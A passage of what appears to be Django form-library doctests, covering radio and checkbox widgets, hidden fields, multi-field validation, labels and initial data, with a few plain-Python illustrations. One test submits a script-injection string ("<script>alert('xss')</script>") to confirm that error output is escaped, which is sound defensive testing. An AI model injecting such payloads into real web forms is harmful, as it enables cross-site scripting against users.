gets a distinct ID, formed by appending an underscore plus the button's
zero-based index.
>>> f = FrameworkForm(auto_id='id_%s')
>>> print f['language']
<ul>
<li><label><input type="radio" id="id_language_0" value="P" name="language" /> Python</label></li>
<li><label><input type="radio" id="id_language_1" value="J" name="language" /> Java</label></li>
</ul>
When RadioSelect is used with auto_id, and the whole form is printed using
either as_table() or as_ul(), the label for the RadioSelect will point to the
ID of the *first* radio button.
>>> print f
<tr><th><label for="id_name">Name:</label></th><td><input type="text" name="name" id="id_name" /></td></tr>
<tr><th><label for="id_language_0">Language:</label></th><td><ul>
<li><label><input type="radio" id="id_language_0" value="P" name="language" /> Python</label></li>
<li><label><input type="radio" id="id_language_1" value="J" name="language" /> Java</label></li>
</ul></td></tr>
>>> print f.as_ul()
<li><label for="id_name">Name:</label> <input type="text" name="name" id="id_name" /></li>
<li><label for="id_language_0">Language:</label> <ul>
<li><label><input type="radio" id="id_language_0" value="P" name="language" /> Python</label></li>
<li><label><input type="radio" id="id_language_1" value="J" name="language" /> Java</label></li>
</ul></li>
>>> print f.as_p()
<p><label for="id_name">Name:</label> <input type="text" name="name" id="id_name" /></p>
<p><label for="id_language_0">Language:</label> <ul>
<li><label><input type="radio" id="id_language_0" value="P" name="language" /> Python</label></li>
<li><label><input type="radio" id="id_language_1" value="J" name="language" /> Java</label></li>
</ul></p>
MultipleChoiceField is a special case, as its data is required to be a list:
>>> class SongForm(Form):
... name = CharField()
... composers = MultipleChoiceField()
>>> f = SongForm(auto_id=False)
>>> print f['composers']
<select multiple="multiple" name="composers">
</select>
>>> class SongForm(Form):
... name = CharField()
... composers = MultipleChoiceField(choices=[('J', 'John Lennon'), ('P', 'Paul McCartney')])
>>> f = SongForm(auto_id=False)
>>> print f['composers']
<select multiple="multiple" name="composers">
<option value="J">John Lennon</option>
<option value="P">Paul McCartney</option>
</select>
>>> f = SongForm({'name': 'Yesterday', 'composers': ['P']}, auto_id=False)
>>> print f['name']
<input type="text" name="name" value="Yesterday" />
>>> print f['composers']
<select multiple="multiple" name="composers">
<option value="J">John Lennon</option>
<option value="P" selected="selected">Paul McCartney</option>
</select>
MultipleChoiceField rendered as_hidden() is a special case. Because it can
have multiple values, its as_hidden() renders multiple <input type="hidden">
tags.
>>> f = SongForm({'name': 'Yesterday', 'composers': ['P']}, auto_id=False)
>>> print f['composers'].as_hidden()
<input type="hidden" name="composers" value="P" />
>>> f = SongForm({'name': 'From Me To You', 'composers': ['P', 'J']}, auto_id=False)
>>> print f['composers'].as_hidden()
<input type="hidden" name="composers" value="P" />
<input type="hidden" name="composers" value="J" />
MultipleChoiceField can also be used with the CheckboxSelectMultiple widget.
>>> class SongForm(Form):
... name = CharField()
... composers = MultipleChoiceField(choices=[('J', 'John Lennon'), ('P', 'Paul McCartney')], widget=CheckboxSelectMultiple)
>>> f = SongForm(auto_id=False)
>>> print f['composers']
<ul>
<li><label><input type="checkbox" name="composers" value="J" /> John Lennon</label></li>
<li><label><input type="checkbox" name="composers" value="P" /> Paul McCartney</label></li>
</ul>
>>> f = SongForm({'composers': ['J']}, auto_id=False)
>>> print f['composers']
<ul>
<li><label><input checked="checked" type="checkbox" name="composers" value="J" /> John Lennon</label></li>
<li><label><input type="checkbox" name="composers" value="P" /> Paul McCartney</label></li>
</ul>
>>> f = SongForm({'composers': ['J', 'P']}, auto_id=False)
>>> print f['composers']
<ul>
<li><label><input checked="checked" type="checkbox" name="composers" value="J" /> John Lennon</label></li>
<li><label><input checked="checked" type="checkbox" name="composers" value="P" /> Paul McCartney</label></li>
</ul>
Regarding auto_id, CheckboxSelectMultiple is a special case. Each checkbox
gets a distinct ID, formed by appending an underscore plus the checkbox's
zero-based index.
>>> f = SongForm(auto_id='%s_id')
>>> print f['composers']
<ul>
<li><label><input type="checkbox" name="composers" value="J" id="composers_id_0" /> John Lennon</label></li>
<li><label><input type="checkbox" name="composers" value="P" id="composers_id_1" /> Paul McCartney</label></li>
</ul>
Data for a MultipleChoiceField should be a list. QueryDict and MultiValueDict
conveniently work with this.
>>> data = {'name': 'Yesterday', 'composers': ['J', 'P']}
>>> f = SongForm(data)
>>> f.errors
{}
>>> from django.http import QueryDict
>>> data = QueryDict('name=Yesterday&composers=J&composers=P')
>>> f = SongForm(data)
>>> f.errors
{}
>>> from django.utils.datastructures import MultiValueDict
>>> data = MultiValueDict(dict(name=['Yesterday'], composers=['J', 'P']))
>>> f = SongForm(data)
>>> f.errors
{}
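The standard library's urllib.parse.parse_qs shows the same idea without Django: repeated keys in a query string come back as lists, which is exactly the shape MultipleChoiceField expects.

```python
from urllib.parse import parse_qs

# Every key maps to a list of values; repeated keys accumulate.
data = parse_qs('name=Yesterday&composers=J&composers=P')
print(data['composers'])  # ['J', 'P']
print(data['name'])       # ['Yesterday']
```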
The MultipleHiddenInput widget renders multiple values as hidden fields.
>>> class SongFormHidden(Form):
... name = CharField()
... composers = MultipleChoiceField(choices=[('J', 'John Lennon'), ('P', 'Paul McCartney')], widget=MultipleHiddenInput)
>>> f = SongFormHidden(MultiValueDict(dict(name=['Yesterday'], composers=['J', 'P'])), auto_id=False)
>>> print f.as_ul()
<li>Name: <input type="text" name="name" value="Yesterday" /><input type="hidden" name="composers" value="J" />
<input type="hidden" name="composers" value="P" /></li>
When using CheckboxSelectMultiple, the framework expects a list of values as
input and returns a list of values as cleaned data.
>>> f = SongForm({'name': 'Yesterday'}, auto_id=False)
>>> f.errors
{'composers': [u'This field is required.']}
>>> f = SongForm({'name': 'Yesterday', 'composers': ['J']}, auto_id=False)
>>> f.errors
{}
>>> f.cleaned_data
{'composers': [u'J'], 'name': u'Yesterday'}
>>> f = SongForm({'name': 'Yesterday', 'composers': ['J', 'P']}, auto_id=False)
>>> f.errors
{}
>>> f.cleaned_data
{'composers': [u'J', u'P'], 'name': u'Yesterday'}
Validation errors are HTML-escaped when output as HTML.
>>> class EscapingForm(Form):
... special_name = CharField()
... def clean_special_name(self):
... raise ValidationError("Something's wrong with '%s'" % self.cleaned_data['special_name'])
>>> f = EscapingForm({'special_name': "Nothing to escape"}, auto_id=False)
>>> print f
<tr><th>Special name:</th><td><ul class="errorlist"><li>Something's wrong with 'Nothing to escape'</li></ul><input type="text" name="special_name" value="Nothing to escape" /></td></tr>
>>> f = EscapingForm({'special_name': "Should escape < & > and <script>alert('xss')</script>"}, auto_id=False)
>>> print f
<tr><th>Special name:</th><td><ul class="errorlist"><li>Something's wrong with 'Should escape &lt; &amp; &gt; and &lt;script&gt;alert('xss')&lt;/script&gt;'</li></ul><input type="text" name="special_name" value="Should escape &lt; &amp; &gt; and &lt;script&gt;alert('xss')&lt;/script&gt;" /></td></tr>
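The escaping step itself can be sketched with the standard library (an illustration only; Python's html.escape also escapes quotes, so its exact entities differ from Django's output above):

```python
from html import escape

# Escape the raw error message before embedding it in markup, so any
# user-supplied markup is rendered inert.
message = "Something's wrong with '%s'" % "<script>alert('xss')</script>"
safe = '<li>%s</li>' % escape(message)
print(safe)
```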
# Validating multiple fields in relation to one another #######################
There are a couple of ways to do multiple-field validation. If you want the
validation message to be associated with a particular field, implement the
clean_XXX() method on the Form, where XXX is the field name. As in
Field.clean(), the clean_XXX() method should return the cleaned value. In the
clean_XXX() method, you have access to self.cleaned_data, a dictionary of
all the data that has been cleaned *so far*, in the order the fields were
defined, up to and including the current field (e.g., the field XXX if you're
in clean_XXX()).
>>> class UserRegistration(Form):
... username = CharField(max_length=10)
... password1 = CharField(widget=PasswordInput)
... password2 = CharField(widget=PasswordInput)
... def clean_password2(self):
... if self.cleaned_data.get('password1') and self.cleaned_data.get('password2') and self.cleaned_data['password1'] != self.cleaned_data['password2']:
... raise ValidationError(u'Please make sure your passwords match.')
... return self.cleaned_data['password2']
>>> f = UserRegistration(auto_id=False)
>>> f.errors
{}
>>> f = UserRegistration({}, auto_id=False)
>>> f.errors
{'username': [u'This field is required.'], 'password1': [u'This field is required.'], 'password2': [u'This field is required.']}
>>> f = UserRegistration({'username': 'adrian', 'password1': 'foo', 'password2': 'bar'}, auto_id=False)
>>> f.errors
{'password2': [u'Please make sure your passwords match.']}
>>> f = UserRegistration({'username': 'adrian', 'password1': 'foo', 'password2': 'foo'}, auto_id=False)
>>> f.errors
{}
>>> f.cleaned_data
{'username': u'adrian', 'password1': u'foo', 'password2': u'foo'}
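The cleaning order and the clean_<field> hook can be sketched as a toy pipeline (an illustration only, not Django's implementation; TinyForm and its names are hypothetical):

```python
class TinyForm:
    fields = ['password1', 'password2']  # definition order

    def __init__(self, data):
        self.data, self.cleaned_data, self.errors = data, {}, {}

    def is_valid(self):
        # Fields are cleaned in definition order, so a clean_<name> hook
        # sees cleaned_data for every field processed so far, including its own.
        for name in self.fields:
            value = self.data.get(name, '')
            if not value:
                self.errors[name] = ['This field is required.']
                continue
            self.cleaned_data[name] = value
            hook = getattr(self, 'clean_%s' % name, None)
            if hook:
                try:
                    self.cleaned_data[name] = hook()
                except ValueError as e:
                    del self.cleaned_data[name]
                    self.errors[name] = [str(e)]
        return not self.errors

class Registration(TinyForm):
    def clean_password2(self):
        cd = self.cleaned_data
        if cd.get('password1') and cd.get('password2') and cd['password1'] != cd['password2']:
            raise ValueError('Please make sure your passwords match.')
        return cd['password2']

f = Registration({'password1': 'foo', 'password2': 'bar'})
print(f.is_valid())  # False
print(f.errors)      # {'password2': ['Please make sure your passwords match.']}
```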
Another way of doing multiple-field validation is by implementing the
Form's clean() method. If you do this, any ValidationError raised by that
method will not be associated with a particular field; it will have a
special-case association with the field named '__all__'.
Note that in Form.clean(), you have access to self.cleaned_data, a dictionary of
all the fields/values that have *not* raised a ValidationError. Also note that
Form.clean() is required to return a dictionary of all cleaned data.
>>> class UserRegistration(Form):
... username = CharField(max_length=10)
... password1 = CharField(widget=PasswordInput)
... password2 = CharField(widget=PasswordInput)
... def clean(self):
... if self.cleaned_data.get('password1') and self.cleaned_data.get('password2') and self.cleaned_data['password1'] != self.cleaned_data['password2']:
... raise ValidationError(u'Please make sure your passwords match.')
... return self.cleaned_data
>>> f = UserRegistration(auto_id=False)
>>> f.errors
{}
>>> f = UserRegistration({}, auto_id=False)
>>> print f.as_table()
<tr><th>Username:</th><td><ul class="errorlist"><li>This field is required.</li></ul><input type="text" name="username" maxlength="10" /></td></tr>
<tr><th>Password1:</th><td><ul class="errorlist"><li>This field is required.</li></ul><input type="password" name="password1" /></td></tr>
<tr><th>Password2:</th><td><ul class="errorlist"><li>This field is required.</li></ul><input type="password" name="password2" /></td></tr>
>>> f.errors
{'username': [u'This field is required.'], 'password1': [u'This field is required.'], 'password2': [u'This field is required.']}
>>> f = UserRegistration({'username': 'adrian', 'password1': 'foo', 'password2': 'bar'}, auto_id=False)
>>> f.errors
{'__all__': [u'Please make sure your passwords match.']}
>>> print f.as_table()
<tr><td colspan="2"><ul class="errorlist"><li>Please make sure your passwords match.</li></ul></td></tr>
<tr><th>Username:</th><td><input type="text" name="username" value="adrian" maxlength="10" /></td></tr>
<tr><th>Password1:</th><td><input type="password" name="password1" value="foo" /></td></tr>
<tr><th>Password2:</th><td><input type="password" name="password2" value="bar" /></td></tr>
>>> print f.as_ul()
<li><ul class="errorlist"><li>Please make sure your passwords match.</li></ul></li>
<li>Username: <input type="text" name="username" value="adrian" maxlength="10" /></li>
<li>Password1: <input type="password" name="password1" value="foo" /></li>
<li>Password2: <input type="password" name="password2" value="bar" /></li>
>>> f = UserRegistration({'username': 'adrian', 'password1': 'foo', 'password2': 'foo'}, auto_id=False)
>>> f.errors
{}
>>> f.cleaned_data
{'username': u'adrian', 'password1': u'foo', 'password2': u'foo'}
# Dynamic construction ########################################################
It's possible to construct a Form dynamically by adding to the self.fields
dictionary in __init__(). Don't forget to call Form.__init__() within the
subclass' __init__().
>>> class Person(Form):
... first_name = CharField()
... last_name = CharField()
... def __init__(self, *args, **kwargs):
... super(Person, self).__init__(*args, **kwargs)
... self.fields['birthday'] = DateField()
>>> p = Person(auto_id=False)
>>> print p
<tr><th>First name:</th><td><input type="text" name="first_name" /></td></tr>
<tr><th>Last name:</th><td><input type="text" name="last_name" /></td></tr>
<tr><th>Birthday:</th><td><input type="text" name="birthday" /></td></tr>
Fields added dynamically to one Form instance do not persist to the next
instance.
>>> class MyForm(Form):
... def __init__(self, data=None, auto_id=False, field_list=[]):
... Form.__init__(self, data, auto_id)
... for field in field_list:
... self.fields[field[0]] = field[1]
>>> field_list = [('field1', CharField()), ('field2', CharField())]
>>> my_form = MyForm(field_list=field_list)
>>> print my_form
<tr><th>Field1:</th><td><input type="text" name="field1" /></td></tr>
<tr><th>Field2:</th><td><input type="text" name="field2" /></td></tr>
>>> field_list = [('field3', CharField()), ('field4', CharField())]
>>> my_form = MyForm(field_list=field_list)
>>> print my_form
<tr><th>Field3:</th><td><input type="text" name="field3" /></td></tr>
<tr><th>Field4:</th><td><input type="text" name="field4" /></td></tr>
>>> class MyForm(Form):
... default_field_1 = CharField()
... default_field_2 = CharField()
... def __init__(self, data=None, auto_id=False, field_list=[]):
... Form.__init__(self, data, auto_id)
... for field in field_list:
... self.fields[field[0]] = field[1]
>>> field_list = [('field1', CharField()), ('field2', CharField())]
>>> my_form = MyForm(field_list=field_list)
>>> print my_form
<tr><th>Default field 1:</th><td><input type="text" name="default_field_1" /></td></tr>
<tr><th>Default field 2:</th><td><input type="text" name="default_field_2" /></td></tr>
<tr><th>Field1:</th><td><input type="text" name="field1" /></td></tr>
<tr><th>Field2:</th><td><input type="text" name="field2" /></td></tr>
>>> field_list = [('field3', CharField()), ('field4', CharField())]
>>> my_form = MyForm(field_list=field_list)
>>> print my_form
<tr><th>Default field 1:</th><td><input type="text" name="default_field_1" /></td></tr>
<tr><th>Default field 2:</th><td><input type="text" name="default_field_2" /></td></tr>
<tr><th>Field3:</th><td><input type="text" name="field3" /></td></tr>
<tr><th>Field4:</th><td><input type="text" name="field4" /></td></tr>
Similarly, changes to field attributes do not persist from one Form instance
to the next.
>>> class Person(Form):
... first_name = CharField(required=False)
... last_name = CharField(required=False)
... def __init__(self, names_required=False, *args, **kwargs):
... super(Person, self).__init__(*args, **kwargs)
... if names_required:
... self.fields['first_name'].required = True
... self.fields['last_name'].required = True
>>> f = Person(names_required=False)
>>> f['first_name'].field.required, f['last_name'].field.required
(False, False)
>>> f = Person(names_required=True)
>>> f['first_name'].field.required, f['last_name'].field.required
(True, True)
>>> f = Person(names_required=False)
>>> f['first_name'].field.required, f['last_name'].field.required
(False, False)
>>> class Person(Form):
... first_name = CharField(max_length=30)
... last_name = CharField(max_length=30)
... def __init__(self, name_max_length=None, *args, **kwargs):
... super(Person, self).__init__(*args, **kwargs)
... if name_max_length:
... self.fields['first_name'].max_length = name_max_length
... self.fields['last_name'].max_length = name_max_length
>>> f = Person(name_max_length=None)
>>> f['first_name'].field.max_length, f['last_name'].field.max_length
(30, 30)
>>> f = Person(name_max_length=20)
>>> f['first_name'].field.max_length, f['last_name'].field.max_length
(20, 20)
>>> f = Person(name_max_length=None)
>>> f['first_name'].field.max_length, f['last_name'].field.max_length
(30, 30)
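Why these per-instance tweaks don't leak between instances can be sketched with a per-instance deep copy of the class-level field definitions (the same idea Django uses; the class names here are hypothetical):

```python
import copy

class Field:
    def __init__(self, required=True):
        self.required = required

class TinyForm:
    # shared, class-level definitions
    base_fields = {'first_name': Field(required=False)}

    def __init__(self):
        # each instance works on its own deep copies of the class-level fields
        self.fields = copy.deepcopy(self.base_fields)

a = TinyForm()
a.fields['first_name'].required = True   # tweak only this instance
b = TinyForm()
print(b.fields['first_name'].required)   # False -- the tweak didn't leak
```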
HiddenInput widgets are displayed differently in the as_table(), as_ul()
and as_p() output of a Form -- neither their verbose names nor a separate
row is displayed. Instead, they're rendered in the last row of the form,
directly after that row's visible form element.
>>> class Person(Form):
... first_name = CharField()
... last_name = CharField()
... hidden_text = CharField(widget=HiddenInput)
... birthday = DateField()
>>> p = Person(auto_id=False)
>>> print p
<tr><th>First name:</th><td><input type="text" name="first_name" /></td></tr>
<tr><th>Last name:</th><td><input type="text" name="last_name" /></td></tr>
<tr><th>Birthday:</th><td><input type="text" name="birthday" /><input type="hidden" name="hidden_text" /></td></tr>
>>> print p.as_ul()
<li>First name: <input type="text" name="first_name" /></li>
<li>Last name: <input type="text" name="last_name" /></li>
<li>Birthday: <input type="text" name="birthday" /><input type="hidden" name="hidden_text" /></li>
>>> print p.as_p()
<p>First name: <input type="text" name="first_name" /></p>
<p>Last name: <input type="text" name="last_name" /></p>
<p>Birthday: <input type="text" name="birthday" /><input type="hidden" name="hidden_text" /></p>
With auto_id set, a HiddenInput still gets an ID, but it doesn't get a label.
>>> p = Person(auto_id='id_%s')
>>> print p
<tr><th><label for="id_first_name">First name:</label></th><td><input type="text" name="first_name" id="id_first_name" /></td></tr>
<tr><th><label for="id_last_name">Last name:</label></th><td><input type="text" name="last_name" id="id_last_name" /></td></tr>
<tr><th><label for="id_birthday">Birthday:</label></th><td><input type="text" name="birthday" id="id_birthday" /><input type="hidden" name="hidden_text" id="id_hidden_text" /></td></tr>
>>> print p.as_ul()
<li><label for="id_first_name">First name:</label> <input type="text" name="first_name" id="id_first_name" /></li>
<li><label for="id_last_name">Last name:</label> <input type="text" name="last_name" id="id_last_name" /></li>
<li><label for="id_birthday">Birthday:</label> <input type="text" name="birthday" id="id_birthday" /><input type="hidden" name="hidden_text" id="id_hidden_text" /></li>
>>> print p.as_p()
<p><label for="id_first_name">First name:</label> <input type="text" name="first_name" id="id_first_name" /></p>
<p><label for="id_last_name">Last name:</label> <input type="text" name="last_name" id="id_last_name" /></p>
<p><label for="id_birthday">Birthday:</label> <input type="text" name="birthday" id="id_birthday" /><input type="hidden" name="hidden_text" id="id_hidden_text" /></p>
If a field with a HiddenInput has errors, the as_table() and as_ul() output
will include the error message(s) with the text "(Hidden field [fieldname]) "
prepended. This message is displayed at the top of the output, regardless of
its field's order in the form.
>>> p = Person({'first_name': 'John', 'last_name': 'Lennon', 'birthday': '1940-10-9'}, auto_id=False)
>>> print p
<tr><td colspan="2"><ul class="errorlist"><li>(Hidden field hidden_text) This field is required.</li></ul></td></tr>
<tr><th>First name:</th><td><input type="text" name="first_name" value="John" /></td></tr>
<tr><th>Last name:</th><td><input type="text" name="last_name" value="Lennon" /></td></tr>
<tr><th>Birthday:</th><td><input type="text" name="birthday" value="1940-10-9" /><input type="hidden" name="hidden_text" /></td></tr>
>>> print p.as_ul()
<li><ul class="errorlist"><li>(Hidden field hidden_text) This field is required.</li></ul></li>
<li>First name: <input type="text" name="first_name" value="John" /></li>
<li>Last name: <input type="text" name="last_name" value="Lennon" /></li>
<li>Birthday: <input type="text" name="birthday" value="1940-10-9" /><input type="hidden" name="hidden_text" /></li>
>>> print p.as_p()
<p><ul class="errorlist"><li>(Hidden field hidden_text) This field is required.</li></ul></p>
<p>First name: <input type="text" name="first_name" value="John" /></p>
<p>Last name: <input type="text" name="last_name" value="Lennon" /></p>
<p>Birthday: <input type="text" name="birthday" value="1940-10-9" /><input type="hidden" name="hidden_text" /></p>
A corner case: It's possible for a form to have only HiddenInputs.
>>> class TestForm(Form):
... foo = CharField(widget=HiddenInput)
... bar = CharField(widget=HiddenInput)
>>> p = TestForm(auto_id=False)
>>> print p.as_table()
<input type="hidden" name="foo" /><input type="hidden" name="bar" />
>>> print p.as_ul()
<input type="hidden" name="foo" /><input type="hidden" name="bar" />
>>> print p.as_p()
<input type="hidden" name="foo" /><input type="hidden" name="bar" />
A Form's fields are displayed in the same order in which they were defined.
>>> class TestForm(Form):
... field1 = CharField()
... field2 = CharField()
... field3 = CharField()
... field4 = CharField()
... field5 = CharField()
... field6 = CharField()
... field7 = CharField()
... field8 = CharField()
... field9 = CharField()
... field10 = CharField()
... field11 = CharField()
... field12 = CharField()
... field13 = CharField()
... field14 = CharField()
>>> p = TestForm(auto_id=False)
>>> print p
<tr><th>Field1:</th><td><input type="text" name="field1" /></td></tr>
<tr><th>Field2:</th><td><input type="text" name="field2" /></td></tr>
<tr><th>Field3:</th><td><input type="text" name="field3" /></td></tr>
<tr><th>Field4:</th><td><input type="text" name="field4" /></td></tr>
<tr><th>Field5:</th><td><input type="text" name="field5" /></td></tr>
<tr><th>Field6:</th><td><input type="text" name="field6" /></td></tr>
<tr><th>Field7:</th><td><input type="text" name="field7" /></td></tr>
<tr><th>Field8:</th><td><input type="text" name="field8" /></td></tr>
<tr><th>Field9:</th><td><input type="text" name="field9" /></td></tr>
<tr><th>Field10:</th><td><input type="text" name="field10" /></td></tr>
<tr><th>Field11:</th><td><input type="text" name="field11" /></td></tr>
<tr><th>Field12:</th><td><input type="text" name="field12" /></td></tr>
<tr><th>Field13:</th><td><input type="text" name="field13" /></td></tr>
<tr><th>Field14:</th><td><input type="text" name="field14" /></td></tr>
Some Field classes have an effect on the HTML attributes of their associated
Widget. If you set max_length in a CharField and its associated widget is
either a TextInput or PasswordInput, then the widget's rendered HTML will
include the "maxlength" attribute.
>>> class UserRegistration(Form):
... username = CharField(max_length=10) # uses TextInput by default
... password = CharField(max_length=10, widget=PasswordInput)
... realname = CharField(max_length=10, widget=TextInput) # redundantly define widget, just to test
... address = CharField() # no max_length defined here
>>> p = UserRegistration(auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" maxlength="10" /></li>
<li>Password: <input type="password" name="password" maxlength="10" /></li>
<li>Realname: <input type="text" name="realname" maxlength="10" /></li>
<li>Address: <input type="text" name="address" /></li>
If you specify a custom "attrs" that includes the "maxlength" attribute,
the Field's max_length attribute will override whatever "maxlength" you specify
in "attrs".
>>> class UserRegistration(Form):
... username = CharField(max_length=10, widget=TextInput(attrs={'maxlength': 20}))
... password = CharField(max_length=10, widget=PasswordInput)
>>> p = UserRegistration(auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" maxlength="10" /></li>
<li>Password: <input type="password" name="password" maxlength="10" /></li>
# Specifying labels ###########################################################
You can specify the label for a field by using the 'label' argument to a Field
class. If you don't specify 'label', Django will use the field name with
underscores converted to spaces, and the initial letter capitalized.
>>> class UserRegistration(Form):
... username = CharField(max_length=10, label='Your username')
... password1 = CharField(widget=PasswordInput)
... password2 = CharField(widget=PasswordInput, label='Password (again)')
>>> p = UserRegistration(auto_id=False)
>>> print p.as_ul()
<li>Your username: <input type="text" name="username" maxlength="10" /></li>
<li>Password1: <input type="password" name="password1" /></li>
<li>Password (again): <input type="password" name="password2" /></li>
Labels for as_* methods will only end in a colon if they don't end in other
punctuation already.
>>> class Questions(Form):
... q1 = CharField(label='The first question')
... q2 = CharField(label='What is your name?')
... q3 = CharField(label='The answer to life is:')
... q4 = CharField(label='Answer this question!')
... q5 = CharField(label='The last question. Period.')
>>> print Questions(auto_id=False).as_p()
<p>The first question: <input type="text" name="q1" /></p>
<p>What is your name? <input type="text" name="q2" /></p>
<p>The answer to life is: <input type="text" name="q3" /></p>
<p>Answer this question! <input type="text" name="q4" /></p>
<p>The last question. Period. <input type="text" name="q5" /></p>
>>> print Questions().as_p()
<p><label for="id_q1">The first question:</label> <input type="text" name="q1" id="id_q1" /></p>
<p><label for="id_q2">What is your name?</label> <input type="text" name="q2" id="id_q2" /></p>
<p><label for="id_q3">The answer to life is:</label> <input type="text" name="q3" id="id_q3" /></p>
<p><label for="id_q4">Answer this question!</label> <input type="text" name="q4" id="id_q4" /></p>
<p><label for="id_q5">The last question. Period.</label> <input type="text" name="q5" id="id_q5" /></p>
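The colon-suffix rule the examples above exercise can be sketched as a small
standalone helper (the function name is ours, not Django's): a trailing colon
is added only when the label does not already end in punctuation.

```python
def add_label_suffix(label, suffix=':'):
    # Hypothetical helper mirroring the rule demonstrated above: append
    # the suffix only when the label does not already end in ':', '?',
    # '!' or '.'.
    if label and label[-1] not in ':?.!':
        return label + suffix
    return label

print(add_label_suffix('The first question'))  # The first question:
print(add_label_suffix('What is your name?'))  # What is your name?
```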
A label can be a Unicode object or a bytestring with special characters.
>>> class UserRegistration(Form):
... username = CharField(max_length=10, label='ŠĐĆŽćžšđ')
... password = CharField(widget=PasswordInput, label=u'\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111')
>>> p = UserRegistration(auto_id=False)
>>> p.as_ul()
u'<li>\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111: <input type="text" name="username" maxlength="10" /></li>\n<li>\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111: <input type="password" name="password" /></li>'
If a label is set to the empty string for a field, that field won't get a label.
>>> class UserRegistration(Form):
... username = CharField(max_length=10, label='')
... password = CharField(widget=PasswordInput)
>>> p = UserRegistration(auto_id=False)
>>> print p.as_ul()
<li> <input type="text" name="username" maxlength="10" /></li>
<li>Password: <input type="password" name="password" /></li>
>>> p = UserRegistration(auto_id='id_%s')
>>> print p.as_ul()
<li> <input id="id_username" type="text" name="username" maxlength="10" /></li>
<li><label for="id_password">Password:</label> <input type="password" name="password" id="id_password" /></li>
If label is None, Django will auto-create the label from the field name. This
is the default behavior.
>>> class UserRegistration(Form):
... username = CharField(max_length=10, label=None)
... password = CharField(widget=PasswordInput)
>>> p = UserRegistration(auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" maxlength="10" /></li>
<li>Password: <input type="password" name="password" /></li>
>>> p = UserRegistration(auto_id='id_%s')
>>> print p.as_ul()
<li><label for="id_username">Username:</label> <input id="id_username" type="text" name="username" maxlength="10" /></li>
<li><label for="id_password">Password:</label> <input type="password" name="password" id="id_password" /></li>
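The auto-generated label described above (underscores to spaces, initial
letter capitalized) can be sketched as a one-line helper; this is an
illustration of the stated rule, not Django's internal code verbatim.

```python
def pretty_name(name):
    # Field name with underscores converted to spaces and the first
    # letter capitalized, per the rule stated above.
    return name.replace('_', ' ').capitalize()

print(pretty_name('username'))      # Username
print(pretty_name('first_name'))    # First name
```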
# Initial data ################################################################
You can specify initial data for a field by using the 'initial' argument to a
Field class. This initial data is displayed when a Form is rendered with *no*
data. It is not displayed when a Form is rendered with any data (including an
empty dictionary). Also, the initial value is *not* used if data for a
particular required field isn't provided.
>>> class UserRegistration(Form):
... username = CharField(max_length=10, initial='django')
... password = CharField(widget=PasswordInput)
Here, we're not submitting any data, so the initial value will be displayed.
>>> p = UserRegistration(auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" value="django" maxlength="10" /></li>
<li>Password: <input type="password" name="password" /></li>
Here, we're submitting data, so the initial value will *not* be displayed.
>>> p = UserRegistration({}, auto_id=False)
>>> print p.as_ul()
<li><ul class="errorlist"><li>This field is required.</li></ul>Username: <input type="text" name="username" maxlength="10" /></li>
<li><ul class="errorlist"><li>This field is required.</li></ul>Password: <input type="password" name="password" /></li>
>>> p = UserRegistration({'username': u''}, auto_id=False)
>>> print p.as_ul()
<li><ul class="errorlist"><li>This field is required.</li></ul>Username: <input type="text" name="username" maxlength="10" /></li>
<li><ul class="errorlist"><li>This field is required.</li></ul>Password: <input type="password" name="password" /></li>
>>> p = UserRegistration({'username': u'foo'}, auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" value="foo" maxlength="10" /></li>
<li><ul class="errorlist"><li>This field is required.</li></ul>Password: <input type="password" name="password" /></li>
An 'initial' value is *not* used as a fallback if data is not provided. In this
example, we don't provide a value for 'username', and the form raises a
validation error rather than using the initial value for 'username'.
>>> p = UserRegistration({'password': 'secret'})
>>> p.errors
{'username': [u'This field is required.']}
>>> p.is_valid()
False
# Dynamic initial data ########################################################
The previous technique dealt with "hard-coded" initial data, but it's also
possible to specify initial data after you've already created the Form class
(i.e., at runtime). Use the 'initial' parameter to the Form constructor. This
should be a dictionary containing initial values for one or more fields in the
form, keyed by field name.
>>> class UserRegistration(Form):
... username = CharField(max_length=10)
... password = CharField(widget=PasswordInput)
Here, we're not submitting any data, so the initial value will be displayed.
>>> p = UserRegistration(initial={'username': 'django'}, auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" value="django" maxlength="10" /></li>
<li>Password: <input type="password" name="password" /></li>
>>> p = UserRegistration(initial={'username': 'stephane'}, auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" value="stephane" maxlength="10" /></li>
<li>Password: <input type="password" name="password" /></li>
The 'initial' parameter is meaningless if you pass data.
>>> p = UserRegistration({}, initial={'username': 'django'}, auto_id=False)
>>> print p.as_ul()
<li><ul class="errorlist"><li>This field is required.</li></ul>Username: <input type="text" name="username" maxlength="10" /></li>
<li><ul class="errorlist"><li>This field is required.</li></ul>Password: <input type="password" name="password" /></li>
>>> p = UserRegistration({'username': u''}, initial={'username': 'django'}, auto_id=False)
>>> print p.as_ul()
<li><ul class="errorlist"><li>This field is required.</li></ul>Username: <input type="text" name="username" maxlength="10" /></li>
<li><ul class="errorlist"><li>This field is required.</li></ul>Password: <input type="password" name="password" /></li>
>>> p = UserRegistration({'username': u'foo'}, initial={'username': 'django'}, auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" value="foo" maxlength="10" /></li>
<li><ul class="errorlist"><li>This field is required.</li></ul>Password: <input type="password" name="password" /></li>
A dynamic 'initial' value is *not* used as a fallback if data is not provided.
In this example, we don't provide a value for 'username', and the form raises a
validation error rather than using the initial value for 'username'.
>>> p = UserRegistration({'password': 'secret'}, initial={'username': 'django'})
>>> p.errors
{'username': [u'This field is required.']}
>>> p.is_valid()
False
If a Form defines 'initial' *and* 'initial' is passed as a parameter to Form(),
then the latter takes precedence.
>>> class UserRegistration(Form):
... username = CharField(max_length=10, initial='django')
... password = CharField(widget=PasswordInput)
>>> p = UserRegistration(initial={'username': 'babik'}, auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" value="babik" maxlength="10" /></li>
<li>Password: <input type="password" name="password" /></li>
# Callable initial data ########################################################
The previous technique dealt with raw values as initial data, but it's also
